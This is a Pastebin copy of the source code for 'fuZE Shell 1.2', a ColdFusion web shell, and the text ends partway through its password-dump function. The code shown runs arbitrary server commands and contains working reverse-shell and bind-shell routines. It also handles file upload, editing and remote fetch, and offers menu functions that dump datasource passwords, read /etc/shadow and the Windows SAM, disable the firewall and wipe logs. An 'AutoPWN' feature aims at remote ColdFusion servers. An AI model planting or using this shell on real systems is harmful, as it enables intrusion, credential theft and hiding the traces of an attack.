API tools faq
paste
kingdanielboy

Untitled

kingdanielboy
Jun 15th, 2016
125
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 55.15 KB | None | 0 0
raw download clone embed print report
  1. <html>
  2.  
  3. <!---
  4. #======================================#
  5. # DeV: XiX .### 9/26/11 #
  6. # # #
  7. # ### /##/ #
  8. # # ,# #
  9. # v3r 1.2 \#####` #
  10. #======================================#
  11. # FuZE #
  12. #======================================#
  13. # #
  14. # Changes in this release: #
  15. # > AutoPWN improved #
  16. # #
  17. # ThX ^_^: #
  18. # > fractal - css & jquery #
  19. # > chippy1337 #
  20. # > MoJiNao, xXx, & Seraph #
  21. # #
  22. #======================================#
  23. --->
  24.  
  25. <!--- _________Login_config_________ ---->
  26. <cfset UserName="Vexy">
  27. <cfset Password="32250170a0dca92d53ec9624f336ca24"> <!--- MD5 --->
  28. <!--- ------------------------------ ---->
  29.  
  30. <head>
  31. <cfsetting requesttimeout="3600">
  32. <cfset tickBegin = GetTickCount()>
  33. <cfset so = CreateObject("java", "java.lang.System")>
  34. <cftry>
  35. <cfobject type="com" class="scripting.filesystemobject" name="fso" action="connect">
  36. <cfcatch type="any">
  37. <cftry>
  38. <cfobject type="com" class="scripting.filesystemobject" name="fso" action="create">
  39. <cfcatch> <!--- N/A ---> </cfcatch>
  40. </cftry>
  41. </cfcatch>
  42. </cftry>
  43. <cfif isDefined("FSO")><cfset Drives = FSO.Drives></cfif>
  44. <cfset icon = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAESElEQVR42u2VW0ibZxzG3y/xEKPxlFjrYSqWFkXxgPUAzjCJurkLW+rooL3pTe9Km4uW3ll3V+YYyOjN2EAEUQRjMjwNhI0Zg0zCrAYRvHCIh0HUiOdj0uf5yFe0cTUbpr3xhZd8id/7Pr//8z8oiY+8pEuAjyFaVlamPT4+jnQ6nZ4PBmAymXITExMfxMTE1Gq12pylpaU/e3t7Pws5QG1trSEuLu77vLy8e7GxsWr+dnR0JCYnJ3/t6Oj4IqQA9fX1BVlZWX3Z2dmfhIeHC5VKJWC9ODg4EBMTE7bOzs7bIQOoq6u7npOT40hPTzco4j6fTxweHoq9vT0xOzvb3d7e/nVIAIxGowaRj+fm5uZHRES8jZx7YWHh7/X19WG32z04NDRkCQkAon9RWVnZrNFohFqtloV3d3cPZ2ZmHm9sbPw4MDDgVd69cIDy8nJ9UVHRHKzXMXraToDp6Wkziq713fcvHADt9ryiouJlVFSUCAsLkyt+eXn5t8XFRZPVavWFHKCxsdGF3OfRfkmShNfrFePj41+tra05t7a2jlCQHnzf/leA0tLSOFh3F71rwmc+oriCIlLzIn8uJ1E81WeJl5SU3EAKZjBwpMjISBmADuCM2NnZEdvb22J+ft48PDzcGgCAwxKozWlpac3JycmxtI/Vy0u4KL6/vy8YSVdX182zAKqrq5uQ/28w6QRbj4s1QIjNzU3hcDj4bMYMCARA1f4A6x7xsCKuXMDFS9i/Ho/H2d3dHQBQWFgoZWZmzl7Dov1K3xMc+Rcul0usrKyI+Ph4M55PA+Dw5wUFBYMYlRIrV4mYorReiYITDDY6LRZLAAAc/LK4uLgfs16OngOHwnNzcwKtJ8MzDampqWaM4dMAsM2G3cDDSuQomD9woAeiB4RQQJBPN3LYc4b9Iwj+Uwqtrq7KogjmW6TtH8IwAL8jv09NTf11CgA5X05KSrpqMBgE2wcgDuhW2Ww2rwhiYerdQtFaOXQYACHw/fXo6GjReWdlgJSUlF2IayhOWgB8NzIy8iwYcaROj6gmUDvpBGCh0i3cdWdsbKw3KAA4sASAFBYgc48L7HDAiOnle99h2K5DtH1oOSPFWSOY8wK1ZEf0VcEEIAPAfltCQkKDTqeTLWQUyJkF3fAz9jFyyRZVQUhCganYJWjPq3jnKYRvsFXpHPOO530EcdNut7uCBtDr9bcQvRUtItcAo+Gl/GRFs6242SHc/F15h3YTmH3OgYP3zf39/a3BiL8F4EIKrMg9i4k1IINwU1h55nRTALiU4URxTjn87Sf8w3kYrPgpAKRBC/pOONFAJ5BHwZRER0fLm/VBGEIQgC1FcQojFayVV2jbJ21tbUF1TgAAV0ZGhgSx+xB7Doh8BYKOKBAEYA34e9oHiNcQftHS0vLLfxE+E+DkqqmpyUJhxp90wZ8Gye+ADx3gbmpqWvw/wucCfKh1CXAJ8AZf/R8/6E7SXwAAAABJRU5ErkJggg==">
  45. <cfset icon_close = "data:image/gif;base64,/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAUDBAQEAwUEBAQFBQUGBwwIBwcHBw8LCwkMEQ8SEhEPERETFhwXExQaFRERGCEYGh0dHx8fExciJCIeJBweHx7/2wBDAQUFBQcGBw4ICA4eFBEUHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh4eHh7/wAARCAANAA0DASIAAhEBAxEB/8QAFQABAQAAAAAAAAAAAAAAAAAABgT/xAAlEAACAgAEBQUAAAAAAAAAAAABAwIEAAUREgYHIUFhEzFCcaH/xAAVAQEBAAAAAAAAAAAAAAAAAAAGB//EABgRAQADAQAAAAAAAAAAAAAAAAEAAgMR/9oADAMBAAIRAxEAPwA9SsMvZrdQqw9Ta9iQkfUkYSju/D474Kc1cxLnZfBLGRiuLB1kdT1j1OD93i67ZezYlaFSdJ2yBOpkSTqT3I9h9Yi4lzuxnDkusLhGcI7TKPz8nzisNunIezxa2Fn/2Q==">
  46. <title>.:: &fnof;uZE Shell ::.</title>
  47. <link rel="SHORTCUT ICON" href="<cfoutput>#icon#</cfoutput>">
  48. <style type="text/css">
  49. html,body{font-family:Verdana,Arial,Helvetica,sans-serif;font-size:11px;background-color:black;color:#bbbbbb;height:98%;overflow:inherit}
  50. table.header-table td { padding:10px; border-width:5px; border-style:outset; }
  51. table.content-table td { padding:10px; border-width:5px; border-style:outset; }
  52. table.function-table td { padding:10px; border-width:5px; border-style:outset; }
  53. textarea.report { width:100%;min-width:400px;background-color:black;color:#bbbbbb; }
  54. #mask { position:absolute; z-index:9000; background-color:#000; display:none; }
  55. #boxes .window { position:fixed; left:0; top:0; width:530px; display:none; z-index:9999; padding:20px; background-color:black;color:#bbbbbb;border-left:solid 1px #00009f;border-right:solid 1px #00009f;border-bottom:solid 1px #00009f; }
  56. #layer1_handle{position:relative;background-color:#00009F;padding:2px;text-align:center;color:#FFF;vertical-align:middle;top:-35px;margin-left:-21px;margin-right:-21px;}
  57. #_close{float:right;text-decoration:none;color:#FFF;}
  58. #_color{background-color:black;color:#bbbbbb;}
  59. #nav a{height:14px;display:block;border:1px solid #000;color:#FFF;text-decoration:none;background-color:#000098;padding-bottom:5px}
  60. #nav a:hover{background-color:#696AF6;color:#FFF}
  61. ._btn{padding:0;margin:0;width:80px;font-size:12px;background-color:#0000B0;color:#bbbbbb;}
  62. .container{position:relative;top:-115px;text-align:center;font-size:14px;float:right;}
  63. .menu{position:relative;top:-21px;height:20px;width:280px;float:right;padding-top:5px;padding-bottom:5px;}
  64. </style>
  65. <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js"></script>
  66. <script>
  67. $(document).ready(function() {
  68. //select all the a tag with name equal to modal
  69. $('a[name=modal]').click(function(e) {
  70. //Cancel the link behavior
  71. e.preventDefault();
  72. //Get the A tag
  73. var id = $(this).attr('href');
  74. //Get the screen height and width
  75. var maskHeight = $(document).height();
  76. var maskWidth = $(window).width();
  77. //Set height and width to mask to fill up the whole screen
  78. $('#mask').css({'width':maskWidth,'height':maskHeight});
  79. //transition effect
  80. $('#mask').fadeIn(1000);
  81. $('#mask').fadeTo("slow",0.8);
  82. //Get the window height and width
  83. var winH = $(window).height();
  84. var winW = $(window).width();
  85. //Set the popup window to center
  86. $(id).css('top', winH/2-$(id).height()/2);
  87. $(id).css('left', winW/2-$(id).width()/2);
  88. //transition effect
  89. $(id).fadeIn(2000);
  90. });
  91. //if close button is clicked
  92. $('.window .close').click(function (e) {
  93. //Cancel the link behavior
  94. e.preventDefault();
  95. $('#mask, .window').hide();
  96. });
  97. //if mask is clicked
  98. $('#mask').click(function () {
  99. $(this).hide();
  100. $('.window').hide();
  101. });
  102. });
  103. </script>
  104. </head>
  105. <body>
  106.  
  107. <cfif IsDefined("LoginButton")>
  108. <cfif Form.UserName eq "#UserName#" and Hash("#Form.Password#") eq "#Password#">
  109. <cflogin>
  110. <cfloginuser name="#UserName#" password="#Password#" roles="admin">
  111. </cflogin>
  112. </cfif>
  113. </cfif>
  114.  
  115. <cfif IsDefined("LogoutButton")>
  116. <cflogout>
  117. </cfif>
  118.  
  119. <cfif IsUserLoggedIn() eq "Yes">
  120. <div id="boxes">
  121. <div id="execute" class="window">
  122. <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Console</div>
  123. <center><pre>:: Execute command on server ::</pre></center>
  124. <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  125. <input type="text" id="_color" name="exec" size=40 <cfif isdefined("Form.exec")>value="<cfoutput>#htmleditformat(Form.exec)#</cfoutput>"</cfif>>
  126. <input name="submit" value="Execute" class="_btn" type="submit"><br />
  127. <input type=checkbox name="nolimit"> No execution time limit
  128. </form><br />
  129. </div>
  130. <div id="edit" class="window">
  131. <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Edit</div>
  132. <center><pre>:: Edit file ::</pre></center>
  133. <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  134. File path | <input type="text" id="_color" name="EditFile" size=40 <cfif isDefined("Form.EditFile")>value="<cfoutput>#htmleditformat(Form.EditFile)#</cfoutput>"</cfif>>
  135. <input name="submit" value="Edit" class="_btn" type="submit">
  136. </form><br />
  137. </div>
  138. <div id="reverse" class="window">
  139. <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Reverse Shell</div>
  140. <center><pre>:: Reverse shell ::</pre></center>
  141. <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  142. <center><input type="text" id="_color" name="reverseip" size=15 <cfif isDefined("Form.reverseip")>value="<cfoutput>#htmleditformat(Form.reverseip)#</cfoutput>"</cfif>> :
  143. <input type="text" id="_color" name="reverseport" size=5 <cfif isDefined("Form.reverseport")>value="<cfoutput>#htmleditformat(Form.reverseport)#</cfoutput>"</cfif>>
  144. <input name="submit" value="Connect" class="_btn" type="submit"></center>
  145. </form>
  146. </div>
  147. <div id="bind" class="window">
  148. <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Bindshell</div>
  149. <center><pre>:: Bindshell ::</pre></center>
  150. <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  151. <center>[1024-65535] <input type="text" id="_color" name="bindport" size=10 <cfif isdefined("Form.bindport")>value="<cfoutput>#htmleditformat(Form.bindport)#</cfoutput>"</cfif>>
  152. <input name="submit" value="Bind" class="_btn" type="submit">
  153. <a href="data:text/html;base64,PGh0bWw+Cjxib2R5Pgo8aDI+VGlwczwvaDI+Cjx1bD4KPGxpPkRpc2FibGUgdGhlIGZpcmV3YWxsIGJlZm9yZSB1c2luZyB0aGlzIGZ1bmN0aW9uIChuZXRzaCBmaXJld2FsbCBzZXQgb3Btb2RlIGRpc2FibGUpLjwvbGk+CjxsaT5EbyBub3Qgc3RvcCB0aGUgcmVxdWVzdCBvciB0aGUgYmluZHNoZWxsIHdpbGwgZmFpbCwgYW5kIHlvdSB3aWxsIG5lZWQgdG8gdXNlIGFub3RoZXIgcG9ydDwvbGk+CjxsaT5UaGUgYmluZHNoZWxsIG9ubHkgYWNjZXB0cyB2YWxpZCBleGVjdXRhYmxlcyBmcm9tIHdpdGhpbiB0aGUgT1MncyBkZWZpbmVkIFBBVEhzLiBNYWtlIHN1cmUgaXQgZXhpc3RzLCBhbmQgaXQgaXMgaW4gb25lIG9mIHRoZSBkaXJlY3RvcmllcyBkZWZpbmVkIGJ5IHRoZSBlbnZpcm9ubWVudCAncGF0aCcgdmFyaWFibGUuIEZvciBleGFtcGxlIChXaW5kb3dzKSwgJ2RpcicgZG9lcyBub3QgZXhpc3QsIGJ1dCAnaG9zdG5hbWUnIGRvZXMuPC9saT4KPGxpPlRoaXMgaXMgYSBWRVJZIHVuc3RhYmxlIENGIGJpbmRzaGVsbCAocHJvdG90eXBlKSEgTGF0ZXIgcmVsZWFzZXMgd2lsbCBmaXggdGhlIHZhcmlvdXMgaXNzdWVzIGluIHRoZSBwcmVzZW50IG9uZS48L2xpPgo8L3VsPgo8L2JvZHk+CjwvaHRtbD4K"> [Tips]</a></center>
  154. </form>
  155. </div>
  156. <div id="functions" class="window">
  157. <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Functions</div>
  158. <center><pre>:: Functions ::</pre></center>
  159. <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  160. <select name="function" style="width: 325px">
  161. <option selected="yes">Select a function</option><optgroup label="ColdFusion"><option>Dump datasource passwords</option><option>Dump CF hashes</option><option>Restart JRUN server (CF)</option><option>Wipe ColdFusion logs</option></optgroup><optgroup label="Windows"><option>Disable Windows firewall</option><option>Enable Telnet service</option><option>Show opened ports [W]</option><option>Read SAM</option><option>Read SECURITY</option><option>Read SYSTEM</option><option>Read IIS paths</option><option>View open sessions [W]</option><option>View local shares</option><option>View domain shares</option><option>View users</option><option>View running processes [W]</option><option>View system info [W]</option><option>Check disk for consistency</option></optgroup><optgroup label="Linux"><option>Find SUID files</option><option>Find SGID files</option><option>Find all *conf* files</option><option>Find all .*_history files</option>
  162. <option>Find all *.pwd files</option><option>Find all .*rc files</option><option>Find all writable directories and files</option><option>Find all writable directories and files in current dir</option><option>Read /etc/passwd</option><option>Read /etc/shadow</option><option>Read /proc/self/environ</option><option>Show opened ports [L]</option><option>View open sessions [L]</option><option>View recent sessions</option><option>View running processes [L]</option>
  163. <option>View memory info</option><option>View CPU info</option><option>View system info [L]</option></optgroup></select><input name="submit" value="Execute" class="_btn" type="submit"></form>
  164. </div>
  165. <div id="decrypt" class="window">
  166. <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Decrypter</div>
  167. <center><pre>:: CF hash decrypter ::</pre></center>
  168. <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  169. B64 CF hash | <input type="text" id="_color" name="decrypt_hash" size=35 <cfif isdefined("Form.decrypt_hash")>value="<cfoutput>#htmleditformat(Form.decrypt_hash)#</cfoutput>"</cfif>>
  170. <input name="submit" value="Decrypt" class="_btn" type="submit">
  171. </form>
  172. </div>
  173. <div id="updown" class="window">
  174. <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>File Transfer</div>
  175. <center><pre>:: Upload/Download files on server ::</pre></center>
  176. <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>" enctype="multipart/form-data" name="Upload" id="Upload"><center>
  177. <input type="file" name="File"/>
  178. <input class="_btn" type="submit" name="Upload" value="Upload"/></center>
  179. </form>
  180. <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  181. Path | <input type="text" id="_color" name="Download" size=40 <cfif isDefined("Form.Download")>value="<cfoutput>#htmleditformat(Form.Download)#</cfoutput>"</cfif>>
  182. <input name="submit" value="Download" class="_btn" type="submit">
  183. </form>
  184. </div>
  185. <div id="upremote" class="window">
  186. <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Remote upload</div>
  187. <center><pre>:: Upload files from remote server ::</pre></center>
  188. <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  189. URL | <input type="text" id="_color" name="RUpload" size=40 <cfif isDefined("Form.RUpload")>value="<cfoutput>#htmleditformat(Form.RUpload)#</cfoutput>"</cfif>>
  190. <input name="submit" value="Upload" class="_btn" type="submit">
  191. </form>
  192. </div>
  193. <div id="runsql" class="window">
  194. <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Sql</div>
  195. <center><pre>:: Run SQL query ::</pre></center>
  196. <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  197. SQL query | <input type="text" id="_color" name="exec_sql" size=35<cfif isdefined("Form.exec_sql")>value="<cfoutput>#htmleditformat(Form.exec_sql)#</cfoutput>"</cfif>><br />
  198. Datasource | <input type="text" id="_color" name="datasource" size=15<cfif isdefined("Form.datasource")>value="<cfoutput>#htmleditformat(Form.datasource)#</cfoutput>"</cfif>><br />
  199. User : Pass | <input type="text" id="_color" name="db_username" size=15 <cfif isdefined("Form.db_username")>value="<cfoutput>#htmleditformat(Form.db_username)#</cfoutput>"</cfif>><input type="text" id="_color" name="db_password" size=15 <cfif isdefined("Form.db_password")>value="<cfoutput>#htmleditformat(Form.db_password)#</cfoutput>"</cfif>><br />
  200. <input name="submit" value="Run" class="_btn" type="submit">
  201. </form>
  202. </div>
  203. <div id="scanlan" class="window">
  204. <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Scan</div>
  205. <center><pre>:: Scan LAN for CF ::</pre></center>
  206. <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  207. <center><input name="cfscan" value="Scan" class="_btn" type="submit"></center>
  208. </form>
  209. </div>
  210. <div id="registry" class="window">
  211. <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Registry</div>
  212. <center><pre>:: Registry ::</pre></center>
  213. <form method="post" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>"><table>
  214. <tr><td>Path | </td><td><input name="regpath" type="text" id="_color" size="40" value="<cfif isDefined("Form.regpath")><cfoutput>#htmleditformat(Form.regpath)#</cfoutput><cfelse>HKEY_LOCAL_MACHINE\</cfif>" /></td></tr><tr>
  215. <td>Key | </td><td><input type="text" id="_color" name="Entry" size="15" <cfif isDefined("Form.Entry")>value="<cfoutput>#htmleditformat(Form.Entry)#</cfoutput>"</cfif> /></td></tr><tr>
  216. <td>New key | </td><td><input type="text" id="_color" name="newentry" size="15" <cfif isDefined("Form.newentry")>value="<cfoutput>#htmleditformat(Form.newentry)#</cfoutput>"</cfif> /></td></tr></table>
  217. <select name="regtype">
  218. <option value="dWord">dWord</option>
  219. <option value="string">string</option>
  220. </select>
  221. <br />
  222. <input class="_btn" type="submit" name="Submit" value="Submit" />
  223. </form>
  224. </div>
  225. <div id="autopwn" class="window">
  226. <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>AutoPWN</div>
  227. <center><pre>:: AutoPWN remote CF ::</pre></center>
  228. <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  229. Target | http://<input type="text" id="_color" name="target_host" size=40 <cfif isDefined("Form.target_host")>value="<cfoutput>#htmleditformat(Form.target_host)#</cfoutput>"</cfif>>/
  230. <input name="submit" value="AutoPWN" class="_btn" type="submit">
  231. </form>
  232. </div>
  233. <div id="nuke" class="window">
  234. <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>Nuke</div>
  235. <center><pre>:: Nuke shell ::</pre></center>
  236. <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  237. <center><input name="nuke" value="Nuke" class="_btn" type="submit"></center>
  238. </form>
  239. </div>
  240. <div id="irc" class="window">
  241. <div id="layer1_handle"><a href="#" id="_close" class="close"><img src="<cfoutput>#icon_close#</cfoutput>" border=0></a>IRC</div>
  242. <center><pre>:: IRC datapipe ::</pre></center>
  243. <table>
  244. <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>"><center>
  245. <tr><td>IP:</td><td><input type="text" id="_color" name="ircip" size=15 <cfif isDefined("Form.ircip")>value="<cfoutput>#htmleditformat(Form.ircip)#</cfoutput>"<cfelse>value="127.0.0.1"</cfif>></td></tr>
  246. <tr><td>Port:</td><td><input type="text" id="_color" name="ircport" size=5 <cfif isDefined("Form.ircport")>value="<cfoutput>#htmleditformat(Form.ircport)#</cfoutput>"<cfelse>value="6667"</cfif>></td></tr>
  247. <tr><td>Nick name:</td><td><input type="text" id="_color" name="ircnick" size=15 <cfif isDefined("Form.ircnick")>value="<cfoutput>#htmleditformat(Form.ircnick)#</cfoutput>"<cfelse>value="fuZE"</cfif>></td></tr>
  248. <tr><td>User name:</td><td><input type="text" id="_color" name="ircuname" size=15 <cfif isDefined("Form.ircuname")>value="<cfoutput>#htmleditformat(Form.ircuname)#</cfoutput>"<cfelse>value="fuZE"</cfif>></td></tr>
  249. <tr><td>Real name:</td><td><input type="text" id="_color" name="ircrname" size=20 <cfif isDefined("Form.ircrname")>value="<cfoutput>#htmleditformat(Form.ircrname)#</cfoutput>"<cfelse>value="fuZE CF IRC Datapipe"</cfif>></td></tr>
  250. <tr><td>Channel:</td><td><input type="text" id="_color" name="ircchan" size=15 <cfif isDefined("Form.ircchan")>value="<cfoutput>#htmleditformat(Form.ircchan)#</cfoutput>"<cfelse>value="#fuZE"</cfif>></td></tr>
  251. <tr><td><input name="submit" value="Connect" class="_btn" type="submit"></center></td></tr>
  252. </form>
  253. </table>
  254. </div>
  255. <div id="mask"></div>
  256. </div>
  257. <table class="header-table" width=100%>
  258. <tr>
  259. <td><img src="<cfoutput>#icon#</cfoutput>"><sup> &fnof;uZE Shell 1.2</sup></td>
  260. <td><div style="float:left;"><cfoutput><pre>#dateformat(now(),'mm-dd-yyyy')# #timeformat(now(),'HH:mm:ss')# Your IP: #cgi.remote_addr# [#cgi.remote_host#] Server IP: #cgi.local_addr# [#cgi.http_host#]</pre></cfoutput></div>
  261. <div style="float:right;"><cfform action="" method="post" name="LogoutForm"><cfinput class="_btn" type="submit" name="LogoutButton" value="Logout"></cfform></div>
  262. </td>
  263. </tr>
  264. <tr>
  265. <td align="right"><pre>OS :<br />CF :<br />ID :<br />CWD :<br />Drive info :</pre></td>
  266. <td>
  267. <cfoutput>
  268. <pre>#server.os.name# [#server.os.version#] #server.os.arch#<br />#server.coldfusion.productname# [#server.coldfusion.productlevel#] #server.coldfusion.productversion#<br />#so.getProperty("user.name")#<br />#getDirectoryFromPath(getCurrentTemplatePath())#<br /><cfif isDefined("FSO")><cfloop collection="#drives#" item="this"><cfif this.DriveLetter is not "A">#this.DriveLetter# [<cfif this.isReady AND ISDefined("this.TotalSize")>#NumberFormat(round(evaluate(this.TotalSize/1024/1024/1024)))# GB </cfif><cfswitch expression="#this.DriveType#">
  269. <cfcase value="1">Removable</cfcase>
  270. <cfcase value="2">Fixed</cfcase>
  271. <cfcase value="3">Network</cfcase>
  272. <cfcase value="4">CDROM</cfcase>
  273. <cfcase value="5">RAMDisk</cfcase>
  274. <cfdefaultcase>Unknown</cfdefaultcase>
  275. </cfswitch>] </cfif></cfloop><cfelse>N/A</cfif></pre>
  276. </cfoutput>
  277. </td>
  278. </tr>
  279. </table>
  280.  
  281. <table class="content-table" width=100%>
  282. <tr><td width="75%"><cfoutput>
  283. <cfif isdefined("Form.exec")>
  284. <cfif isdefined("Form.nolimit")><cfset exectimeout=3600><cfelse><cfset exectimeout=10></cfif>
  285. <cfif server.os.name neq "UNIX">
  286. <pre>Executing 'cmd.exe /c #htmleditformat(Form.exec)#'</pre>
  287. <cfexecute name="cmd.exe" arguments="/c #Form.exec#" timeout="#exectimeout#" variable="cmdout"></cfexecute>
  288. <cfelse>
  289. <pre>Executing 'sh -c "#htmleditformat(REReplace(Form.exec,"""","'","ALL"))#"'</pre>
  290. <cfexecute name="sh" arguments="-c ""#REReplace(Form.exec,"""","'","ALL")#""" timeout="#exectimeout#" variable="cmdout"></cfexecute>
  291. </cfif>
  292. <textarea class="report" rows="20">#htmleditformat(cmdout)#</textarea>
  293. <cfelseif isdefined("Form.EditFile")>
  294. <pre>Editing file '#htmleditformat(Form.EditFile)#'</pre>
  295. <cftry>
  296. <cfif fileexists(Form.EditFile)>
  297. <!--- OK --->
  298. <cfelse>
  299. <cfthrow message="File not found">
  300. </cfif>
  301. <cffile action="Read" file="#Form.EditFile#" variable="FileData">
  302. <form method="POST" action="<cfoutput>#CGI.SCRIPT_NAME#</cfoutput>">
  303. <textarea name="FileContent" class="report" rows="20"><cfoutput>#htmleditformat(FileData)#</cfoutput></textarea>
  304. Save to | <input type="text" id="_color" name="SaveFile" size=40 value="<cfoutput>#Form.EditFile#</cfoutput>"> <input name="submit" value="Save" class="_btn" type="submit">
  305. </form>
  306. <cfcatch><textarea class="report" rows="20">Error<cfif isDefined("cfcatch.message")>: <cfoutput>#cfcatch.message#</cfoutput></cfif></textarea></cfcatch>
  307. </cftry>
  308. <cfelseif isDefined("Form.SaveFile")>
  309. <pre>Saving file '#htmleditformat(Form.SaveFile)#'</pre>
  310. <textarea class="report" rows="20">
  311. <cftry>
  312. <cffile action="Write" file="#Form.SaveFile#" output="#Form.FileContent#" addnewline = "no">Save success
  313. <cfcatch>Error<cfif isDefined("cfcatch.message")>: <cfoutput>#cfcatch.message#</cfoutput></cfif></cfcatch>
  314. </cftry>
  315. </textarea>
  316. <cfelseif isdefined("Form.bindport")>
  317. <pre>Binding shell to port #htmleditformat(Form.bindport)#</pre>
  318. <textarea class="report" rows="20">
  319. <cftry>
  320. <cfscript>
  321. try{
  322.  
  323. // Create socket
  324. serversocket=createObject("java","java.net.ServerSocket");
  325. serversocket.init(Form.bindport);
  326. writeoutput("ServerSocket created at port #serversocket.getLocalPort()##chr(10)#");
  327.  
  328. // Accept incoming connections
  329. connection=serversocket.accept();
  330. writeoutput("Connection received from #connection.getInetAddress().getHostName()##chr(10)#");
  331.  
  332. // Establish connection
  333. try{
  334. instream=createObject("java","java.io.BufferedReader").init(createObject("java","java.io.InputStreamReader").init(connection.getInputStream()));
  335. outstream=createObject("java","java.io.PrintWriter").init(connection.getOutputStream());
  336. writeoutput("Connection successful!#chr(10)#");
  337. } catch (IOException e) {
  338. writeoutput("IO Exception: Read failed#chr(10)#");
  339. }
  340.  
  341. // Communicate
  342. outstream.println(".:: fuZE CF Bindshell ::.");
  343. outstream.print("> ");
  344. outstream.flush();
  345. while(True){
  346. str = instream.readLine();
  347. cmd = str.split(" ");
  348. if (not str.matches("exit")){
  349. p = createObject("java","java.lang.ProcessBuilder").init(cmd).start();
  350. i = createObject("java","java.io.InputStreamReader").init(p.getInputStream());
  351. br = createObject("java","java.io.BufferedReader").init(i);
  352. line=br.readLine();
  353. while (isDefined("line")) {
  354. outstream.println(line);
  355. outstream.flush();
  356. line = br.readLine();
  357. }
  358. br.close();
  359. i.close();
  360. outstream.print("> ");
  361. outstream.flush();
  362. }
  363. else {
  364. outstream.println("Terminating");
  365. outstream.close();
  366. instream.close();
  367. connection.close();
  368. serversocket.close();
  369. }
  370. }
  371.  
  372. }catch (Exception e) {
  373. writeoutput("Exception: Error#chr(10)#");
  374. }
  375. </cfscript>
  376. <cfcatch>Connection terminated</cfcatch>
  377. </cftry>
  378. </textarea>
  379. <cfelseif isDefined("Form.reverseip") and isDefined("Form.reverseport")>
  380. <pre>Sending shell to #htmleditformat(Form.reverseip)#:#htmleditformat(Form.reverseport)#</pre>
  381. <textarea class="report" rows="20">
  382. <cftry>
  383. <cfscript>
  384. try{
  385.  
  386. // Create socket
  387. socket=createObject("java","java.net.Socket");
  388.  
  389. // Connect to remote host
  390. socket.connect(createObject("java","java.net.InetSocketAddress").init(Form.reverseip,Form.reverseport));
  391. writeoutput("Remote port reached: #socket.isConnected()##chr(10)#");
  392.  
  393. // Establish connection
  394. try{
  395. instream=createObject("java","java.io.BufferedReader").init(createObject("java","java.io.InputStreamReader").init(socket.getInputStream()));
  396. outstream=createObject("java","java.io.PrintWriter").init(socket.getOutputStream());
  397. writeoutput("Connection successful!#chr(10)#");
  398. } catch (IOException e) {
  399. writeoutput("IO Exception: Read failed#chr(10)#");
  400. }
  401.  
  402. // Communicate
  403. outstream.println(".:: fuZE CF Reverse Shell ::.");
  404. outstream.print("> ");
  405. outstream.flush();
  406. while(True){
  407. str = instream.readLine();
  408. cmd = str.split(" ");
  409. if (not str.matches("exit")){
  410. p = createObject("java","java.lang.ProcessBuilder").init(cmd).start();
  411. i = createObject("java","java.io.InputStreamReader").init(p.getInputStream());
  412. br = createObject("java","java.io.BufferedReader").init(i);
  413. line=br.readLine();
  414. while (isDefined("line")) {
  415. outstream.println(line);
  416. outstream.flush();
  417. line = br.readLine();
  418. }
  419. br.close();
  420. i.close();
  421. outstream.print("> ");
  422. outstream.flush();
  423. }
  424. else {
  425. outstream.println("Terminating");
  426. outstream.close();
  427. instream.close();
  428. socket.close();
  429. }
  430. }
  431.  
  432. }catch (Exception e) {
  433. writeoutput("Exception: Error#chr(10)#");
  434. }
  435. </cfscript>
  436. <cfcatch>Connection terminated</cfcatch>
  437. </cftry>
  438. </textarea>
  439. <cfelseif isDefined("Form.function")>
  440. <pre>Function: '#htmleditformat(Form.function)#'</pre>
  441. <textarea class="report" rows="20">
  442. <cftry>
  443. <cfswitch expression="#Form.function#">
  444. <!--- ColdFusion functions --->
  445. <cfcase value="Dump datasource passwords">Datasource : Password
  446. <cfscript>
  447. o=createobject("java","coldfusion.server.ServiceFactory").getDatasourceService().getDatasources();
  448. for(i in o) {
